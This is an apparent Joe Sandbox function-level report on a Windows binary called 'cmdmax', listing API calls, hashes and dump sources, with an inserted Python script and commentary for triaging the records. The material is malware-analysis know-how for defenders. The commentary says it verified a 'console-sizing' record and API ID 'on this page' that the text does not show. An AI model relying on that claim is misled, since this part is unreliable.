                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$CommandCreateFileHeapInfoLineStartupTypeVersion
                        • String ID: 8U$8U
                        • API String ID: 796813354-3775541337
                        • Opcode ID: f6e6d59e7de11bbe1f9c79c4729ef30da786d8d204601ce81188c11fc54d5798
                        • Instruction ID: bae357295b154c56a0da60b6029cb3d48fad92364151424cd4935dcd8c5fbeea
                        • Opcode Fuzzy Hash: f6e6d59e7de11bbe1f9c79c4729ef30da786d8d204601ce81188c11fc54d5798
                        • Instruction Fuzzy Hash: CB2163B1D04644AFD710EF69AE0675A7BA8EB04315F10063FF419B37E2E77C65008B6A

                        Control-flow Graph

                        • Control-flow graph of function 00402780 (basic blocks 402780-4027ff; rendering not reproduced). Blocks call the subroutine 402800 twice and ExitProcess.
                        APIs
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 54e3e19046fbf29639bf15c34da984302160871c38c6a1032c6c2c714584590b
                        • Instruction ID: 801cb8b31a74135f60e5dde2dc570042dc3b1dfd1c2c9a6f8921881583090a25
                        • Opcode Fuzzy Hash: 54e3e19046fbf29639bf15c34da984302160871c38c6a1032c6c2c714584590b
                        • Instruction Fuzzy Hash: 9CF0AF769042009AEF20AB79EF8DB6677A0A750705F10457FF880731E1D6B8BC448A7F

                        Control-flow Graph

                        • Control-flow graph of function 00403670 (a single basic block, 403670-403684, calling HeapCreate; rendering not reproduced).
                        APIs
                        • HeapCreate.KERNELBASE(00000001,00001000,00000000,004017CC), ref: 00403679
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 07373dfd54a1dc70f1ee3f471f143bd0286662016e5a5ba00e92ec479078b4e4
                        • Instruction ID: 5d6950380f6a30326c0bb27adfbe44092808890bba6650e2d3bb44798f57916f
                        • Opcode Fuzzy Hash: 07373dfd54a1dc70f1ee3f471f143bd0286662016e5a5ba00e92ec479078b4e4
                        • Instruction Fuzzy Hash: 10B012702813009EE3100B305F06F4435206708B42F100024B2807C1E4CAF01051850D

                        Control-flow Graph

                        • Control-flow graph of function 00404790 (basic blocks 404790-4049ba; rendering not reproduced). Blocks call LCMapStringA, LCMapStringW, MultiByteToWideChar and WideCharToMultiByte, and the subroutines 4049c0, 403ea0 and 404b20.
                        APIs
                        • LCMapStringA.KERNEL32(00000000,00000100,00407E20,00000001,00000000,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 004047B5
                        • LCMapStringW.KERNEL32(00000000,00000100,00407E24,00000001,00000000,00000000,?,?,?,?,?,0000000A), ref: 004047D4
                        • LCMapStringA.KERNEL32(00000001,00000001,00000001,?,00000200,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 00404838
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000001,?,00000000,00000000,?,00000000,0000000B,?,00402961,00000000,00000200,?,00000001,?), ref: 0040486F
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,0000000A), ref: 004048AE
                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,0000000A), ref: 004048C8
                        • LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?), ref: 004048FD
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: String$ByteCharMultiWide
                        • String ID:
                        • API String ID: 352835431-0
                        • Opcode ID: 91689ef6a8061157262080b5655910052be4cc0885f97463720962df06819704
                        • Instruction ID: 2c29ff3f2fb97a1670f5a264d2ad8a999c8045613722e7b8bdd10dfdb192a7e9
                        • Opcode Fuzzy Hash: 91689ef6a8061157262080b5655910052be4cc0885f97463720962df06819704
                        • Instruction Fuzzy Hash: AD517CF67043006BE210EBA5AC41F6B7798DBC9755F14043AF744E72D0DA79EC018BAA

                        Control-flow Graph

                        • Control-flow graph of function 00403020 (basic blocks 403020-4031ba; rendering not reproduced). Blocks call GetEnvironmentStringsW, GetEnvironmentStrings, WideCharToMultiByte, FreeEnvironmentStringsW and FreeEnvironmentStringsA, and the subroutines 403ea0 and 404b20.
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 00403036
                        • GetEnvironmentStrings.KERNEL32 ref: 0040304E
                        • GetEnvironmentStringsW.KERNEL32 ref: 0040308F
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030CF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030F6
                        • FreeEnvironmentStringsW.KERNEL32(?), ref: 0040310C
                        • FreeEnvironmentStringsW.KERNEL32(?), ref: 0040311D
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: 33bbc3f1baf684cecbe4868c8c978916208efd2582274dfbb109430b9d872f4c
                        • Instruction ID: 4005c8ad7f123dcd08d34e7d596d0a2ed273d4a167ce10c24e384bddb9be3eea
                        • Opcode Fuzzy Hash: 33bbc3f1baf684cecbe4868c8c978916208efd2582274dfbb109430b9d872f4c
                        • Instruction Fuzzy Hash: AF412576B403045BE7206F64BC497673B98E784333F54003BED05A6381E77EA90CC29A

                        Control-flow Graph

                        • Control-flow graph of function 00404B40 (basic blocks 404b40-404bd1; rendering not reproduced). Blocks call LoadLibraryA and GetProcAddress (three times).
                        APIs
                        • LoadLibraryA.KERNEL32(user32.dll,?,?,?,0040394A,?,Microsoft Visual C++ Runtime Library,00012010,?,?,00000000), ref: 00404B52
                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404B6A
                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404B7B
                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404B88
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                        • API String ID: 2238633743-4044615076
                        • Opcode ID: 4a9723a7828e76fe50fc032433e0afbaf72be46e8f0aae19df462a7516b8695a
                        • Instruction ID: bd30521effc3bf44185d56dacefefe439e8c1685cf67d71c121490aaf00fd7e0
                        • Opcode Fuzzy Hash: 4a9723a7828e76fe50fc032433e0afbaf72be46e8f0aae19df462a7516b8695a
                        • Instruction Fuzzy Hash: CD0184B1A063565BD310AFA5DD84F2B77E8DBC4B5271401B6E900F2290C7B8EC44CBEA
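Two records above show the run-time import resolution the report flags: the console-sizing function (GetModuleHandleA.KERNEL32(kernel32.dll,GetConsoleWindow) at 004010EB followed by GetProcAddress at 004010F2) and function 00404B40 (LoadLibraryA(user32.dll) followed by GetProcAddress for MessageBoxA, GetActiveWindow and GetLastActivePopup). The Python below is an added triage example, not part of this report or of Joe Sandbox. It parses "APIs" bullets in the format printed on this page, pairs each module loader with the GetProcAddress calls that follow it, and recomputes the "API ID" shown under "Similarity". The API-ID rule is an inference from the records on this page (CamelCase tokens of four or more characters, counted over every listed call, grouped by frequency, alphabetical inside a group, joined with '$'), not a documented vendor algorithm; treating identifier-like strings in the loader line's extra stack slots (here GetConsoleWindow) as symbol candidates is likewise the editor's heuristic. The label for the user32 triple rests on the fact that a statically linked MSVC runtime resolves exactly MessageBoxA, GetActiveWindow and GetLastActivePopup in __crtMessageBoxA. The sample input is copied from the two records on this page.

```python
"""Triage helpers for the per-function "APIs" and "Similarity" records of a Joe Sandbox
report.  Added example, not part of the report or of Joe Sandbox.  The API-ID rule is
inferred from this page's records, not a documented algorithm: split each API name on
CamelCase boundaries, drop tokens shorter than four characters (Get, Set, A, W, Std,
Pos, Map, To), count the rest over every listed call including "Part of subcall" lines,
and emit count groups from most to least frequent, alphabetical within a group, '$'-joined."""
import re
from collections import Counter

# One "APIs" bullet, with or without a "Part of subcall function NNN:" prefix.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
HEX = re.compile(r"^[0-9A-Fa-f]{8}$")
IDENT = re.compile(r"^[A-Za-z_]\w*$")
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}
CRT_MSGBOX = {"MessageBoxA", "GetActiveWindow", "GetLastActivePopup"}  # MSVC __crtMessageBoxA

# Two "APIs" records copied from this report: the console-sizing function
# (refs 004010EB-00401332) and the runtime helper at 00404B40.
CONSOLE_FN = """
• GetModuleHandleA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 004010EB
• GetProcAddress.KERNEL32(00000000), ref: 004010F2
• GetStdHandle.KERNEL32(000000F5), ref: 00401116
• GetLargestConsoleWindowSize.KERNEL32(00000001), ref: 0040112D
• ExitProcess.KERNEL32 ref: 0040128B
• GetConsoleWindow.KERNELBASE(00000000,?,?,00000000,00000000,00000001), ref: 004012EF
• SetWindowPos.USER32(00000000), ref: 004012F6
• SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401304
• SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401314
• SetConsoleScreenBufferSize.KERNELBASE(00000007,8U), ref: 00401322
• SetConsoleWindowInfo.KERNELBASE(00000007,00000001,00000000), ref: 00401332
"""
MSGBOX_FN = """
• LoadLibraryA.KERNEL32(user32.dll,?,?,?,0040394A,?,Microsoft Visual C++ Runtime Library,00012010,?,?,00000000), ref: 00404B52
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404B6A
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404B7B
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404B88
"""

def parse_api_lines(text):
    """Return one dict per API reference line; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["args"] = [a for a in (rec["args"] or "").split(",") if a]
            calls.append(rec)
    return calls

def tokens(api_name):
    """CamelCase split keeping only tokens of four or more characters."""
    parts = re.findall(r"[A-Z][a-z]+|[A-Z]+(?![a-z])|[a-z]+", api_name)
    return [p for p in parts if len(p) >= 4]

def api_id(api_names):
    """Frequency-grouped token signature, e.g. 'AddressProc$LibraryLoad'."""
    counts = Counter(t for name in api_names for t in tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))

def dynamic_imports(calls):
    """Pair each LoadLibrary/GetModuleHandle with the GetProcAddress calls after it.
    Symbols come from GetProcAddress's second argument when the report captured it;
    otherwise identifier-like strings in the loader's extra stack slots are kept as
    candidates (heuristic: the report prints several dwords past the real argument)."""
    found, current = [], None
    for c in calls:
        if c["api"] in LOADERS:
            extra = [a for a in c["args"][1:] if IDENT.match(a) and not HEX.match(a)]
            current = {"module": c["args"][0] if c["args"] else "?",
                       "symbols": [], "candidates": extra}
            found.append(current)
        elif c["api"] == "GetProcAddress" and current is not None and len(c["args"]) > 1:
            current["symbols"].append(c["args"][1])
    return found

def classify(resolved):
    """Label a resolved import set; anything unrecognised is left for the analyst."""
    if resolved["module"].lower() == "user32.dll" and set(resolved["symbols"]) == CRT_MSGBOX:
        return "MSVC CRT __crtMessageBoxA (runtime boilerplate, not sample logic)"
    return "dynamic import resolution: review"

def triage(text):
    calls = parse_api_lines(text)
    return {"api_id": api_id(c["api"] for c in calls),
            "dynamic_imports": [dict(r, verdict=classify(r)) for r in dynamic_imports(calls)]}

if __name__ == "__main__":
    for label, text in (("console function", CONSOLE_FN), ("00404B40", MSGBOX_FN)):
        print(label, triage(text))
```

Run against the two records, the recomputed API IDs equal the values printed under "Similarity" on this page (Console$Window$Size$BufferHandleInfoScreen$AddressExitLargestModuleProcProcess and AddressProc$LibraryLoad), so the rule can be used to compare functions across reports. The kernel32 record yields no captured symbol but the candidate GetConsoleWindow, consistent with that function's String ID; the user32 record is classified as runtime boilerplate, which is why its LoadLibraryA/GetProcAddress chain should not be read as evasive behaviour of the sample itself.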

                        Control-flow Graph (graph image not reproduced; function begins at block 4037b0)
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00403830
                        • GetStdHandle.KERNEL32(000000F4,?,?,00000000), ref: 00403967
                        • WriteFile.KERNEL32(?,?,FFFFFFFE,00000000,00000000,?,?,00000000), ref: 0040398D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: File$HandleModuleNameWrite
                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                        • API String ID: 3784150691-4022980321
                        • Opcode ID: a436efcfc72d5c591da5e93a6fc445f4f5db0aa4265214052baa93e641a77d96
                        • Instruction ID: 9c3b1f96b856c350f621c52e0a91f0f66bf3b15c1bfcf1076c0cd6de472e1383
                        • Opcode Fuzzy Hash: a436efcfc72d5c591da5e93a6fc445f4f5db0aa4265214052baa93e641a77d96
                        • Instruction Fuzzy Hash: 974113367046050BD728DA389A1477E7BD6EFC4321F50473EFA26B76D0CAB9AE048256

                        Control-flow Graph (graph image not reproduced; function begins at block 4049f0)
                        APIs
                        • GetStringTypeA.KERNEL32(00000000,00000001,00407E20,00000001,?,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404A16
                        • GetStringTypeW.KERNEL32(00000001,00407E24,00000001,?,?,?,?,0000000A), ref: 00404A31
                        • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404A7F
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00000000,0000000B,?,?,00000002,?,?,?,0000000A), ref: 00404AB6
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,?,?,?,?,0000000A), ref: 00404AE2
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 00404AF8
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: 9088a58cb0110ca152e68b03d436b7ab7cd9faafc8e28d45a1373a8a13234b3e
                        • Instruction ID: 871e9140d8e42ba65fb42cff073d1d9aef57c38841bfaff7c614589857a5e468
                        • Opcode Fuzzy Hash: 9088a58cb0110ca152e68b03d436b7ab7cd9faafc8e28d45a1373a8a13234b3e
                        • Instruction Fuzzy Hash: 803190B27452006BE210DB65EC85F3B73A9E7C9715F04013AFB44B7280D6B9FC058BAA

                        Control-flow Graph (graph image not reproduced; function begins at block 401000)
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 0040101D
                        • SetConsoleTitleA.KERNEL32(?), ref: 00401044
                        • Sleep.KERNEL32(00000064), ref: 00401052
                        • FindWindowA.USER32(00000000,?), ref: 00401061
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID: ConsoleCurrentFindProcessSleepTitleWindow
                        • String ID: CMDMAX:%d
                        • API String ID: 960006182-1358362588
                        • Opcode ID: 48520546924323c45bbdf36bac6515e9c5ea32c08305208bdbf8af8f6b11a226
                        • Instruction ID: 5a933a1f5bc0470be587deae832df0d0f7ca835772c44b334be0bbb2aee9f6c3
                        • Opcode Fuzzy Hash: 48520546924323c45bbdf36bac6515e9c5ea32c08305208bdbf8af8f6b11a226
                        • Instruction Fuzzy Hash: 9C018171900218EBEB50AB94DE49B99B77CFB00306F1080A6F685F6091DBB45A888F66

                        Control-flow Graph (graph image not reproduced; function begins at block 404460)
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2102375046.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 0000000E.00000002.2102349203.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.0000000000407000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102402883.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                        • Associated: 0000000E.00000002.2102443061.000000000040B000.00000002.00000001.01000000.00000007.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_cmdmax.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8U$8U
                        • API String ID: 0-3775541337
                        • Opcode ID: 279e0f3b3c639ea789faf66da0ce8ed5188860ee897f02ffd9ec8a6a7380b589
                        • Instruction ID: a15cc9a720b6fc96f73c426fe8e84c72349cbb01d9c51f1ad63f8179ffeffdd9
                        • Opcode Fuzzy Hash: 279e0f3b3c639ea789faf66da0ce8ed5188860ee897f02ffd9ec8a6a7380b589
                        • Instruction Fuzzy Hash: 6E61E5F6A04201AFD7109E68FC007677794EBC1325F04067EEA11963D1E77EE948CA9A